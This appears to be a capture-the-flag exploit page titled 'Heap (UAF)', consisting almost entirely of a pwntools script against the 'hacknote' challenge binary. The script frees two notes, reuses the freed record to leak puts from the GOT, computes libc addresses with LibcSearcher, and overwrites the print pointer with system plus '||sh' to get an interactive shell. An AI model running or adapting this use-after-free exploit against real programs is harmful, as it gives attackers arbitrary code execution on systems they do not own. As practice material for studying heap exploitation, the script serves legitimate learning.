堆(UAF)


堆(UAF)

exp

from pwn import *
from LibcSearcher import * 

# Spawn the local challenge binary; the commented remote() line below is the
# alternative target.  Note the debug log level is switched on *after* the
# spawn, so the process start itself is not logged at that level.
p=process("./hacknote")
context.log_level="debug"

#p=remote("node4.buuoj.cn",27009)
elf=ELF("./hacknote")
# GOT slot of puts in the binary; its contents are read back later to derive
# the libc load address.
puts_got=elf.got['puts']

def add(size,content):
    """Menu option 1: create a note of `size` bytes filled with `content`.

    `content` is sent with send(), not sendline(), so no trailing newline
    is appended to the note body.
    """
    numeric_prompts = (
        ("Your choice :", '1'),
        ('Note size :', str(size)),
    )
    for prompt, answer in numeric_prompts:
        p.recvuntil(prompt)
        p.sendline(answer)
    p.recvuntil("Content :")
    p.send(content)

def delete(index):
    """Menu option 2: delete the note stored at `index`."""
    dialogue = (('Your choice :', '2'), ('Index :', str(index)))
    for prompt, answer in dialogue:
        p.recvuntil(prompt)
        p.sendline(answer)

def show(index):
    """Menu option 3: ask the program to print the note at `index`.

    Whatever the program prints is left in the tube; the caller reads it
    (see the p.recv(4) after show(0) below).
    """
    choice = '3'
    idx = str(index)
    p.recvuntil('Your choice :')
    p.sendline(choice)
    p.recvuntil('Index :')
    p.sendline(idx)


# Allocate two notes, then free both.  The exploit relies on the freed
# index-0 record still being reachable through show() afterwards (the UAF
# the page is about); the exact chunk-reuse order is a property of the
# target binary and allocator, not visible from this script.
add(0x18,'aaaa')
add(0x18,'bbbb')
delete(0)
delete(1)

log.info('puts_got:'+hex(puts_got))
# Hard-coded address of the binary's own print routine for this build;
# must be re-checked if the binary changes.
puts=0x804862b

# New note with an 8-byte body: the print routine's address followed by
# the GOT slot.  From its use below, show(0) presumably ends up calling
# the first word with the second as argument, printing puts@GOT.
payload=p32(puts)+p32(puts_got)
add(8,payload)

show(0)
# The leaked GOT contents are the runtime address of puts in libc.
puts_addr=u32(p.recv(4))
log.info("puts_addr:"+hex(puts_addr))

# Identify the remote libc from the leaked puts address; LibcSearcher may
# offer several candidate libcs and prompt for a choice.
libc=LibcSearcher("puts",puts_addr) # this is a libcsearch object
libcbase=puts_addr-libc.dump("puts") # address
binsh_addr=libcbase+libc.dump("str_bin_sh") # address (computed but not used below)
system_addr=libcbase+libc.dump("system") # address
delete(2)

# NOTE: bytes + str concatenation — this is Python 2 code; under Python 3
# this line raises TypeError (p32() returns bytes).
payload=p32(system_addr)+'||sh'
add(8,payload)
#gdb.attach(p)
show(0)


p.interactive()

相关